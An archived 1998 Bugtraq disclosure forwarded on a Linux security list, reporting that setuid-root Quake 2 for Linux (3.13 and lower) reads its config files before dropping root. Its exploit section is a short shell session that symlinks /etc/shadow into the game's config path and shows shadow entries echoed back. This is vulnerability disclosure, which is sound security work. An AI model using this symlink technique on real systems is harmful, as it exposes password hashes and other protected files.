thr3ads.net - linux security - Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files [Forwarded e-mail from kevingeo@CRUZIO.COM] [Feb 1998]

If this information is useful, please help other people find it:
Share via:

Jeff Uphoff

1998-Feb-25 20:43 UTC

Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files [Forwarded e-mail from kevingeo@CRUZIO.COM]

------- start of forwarded message (RFC 934 encapsulation) -------
From: kevingeo@CRUZIO.COM
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
To: BUGTRAQ@NETSPACE.ORG
Subject:      Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files
Date: 	Wed, 25 Feb 1998 05:49:58 -0500
Reply-To: kevingeo@CRUZIO.COM

Vulnerable:
Everyone who followed the installation instructions and made Quake2 setuid
root.

Exploit:
Quake2 reads its conf files (and .pak files) before giving up root,
and it doesn''t check the permissions before hand.

nop@chrome:~> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~> mkdir baseq2
nop@chrome:~> ln -s /etc/shadow baseq2/config.cfg
nop@chrome:~> ls -l /usr/games/quake/quake2
- -rws--x--x   1 root     root       303444 Feb 24 19:07
/usr/games/quake/quake2
nop@chrome:~> /usr/games/quake/quake2
couldn''t exec default.cfg
execing config.cfg
Unknown command "root:[snip]:10137:0:99999:7:::"
Unknown command "bin:*:9977:0:99999:7:::"
Unknown command "daemon:*:9977:0:99999:7:::"
Unknown command "adm:*:9977:0:99999:7:::"
Unknown command "lp:*:9977:0:99999:7:::"
[etc]
------- end -------

Apparently Analagous Threads

Search for more seemingly similar threads

linux security - Feb 1998 - Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files [Forwarded e-mail from kevingeo@CRUZIO.COM]

Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files [Forwarded e-mail from kevingeo@CRUZIO.COM]

Apparently Analagous Threads

Wisdom of the Ancients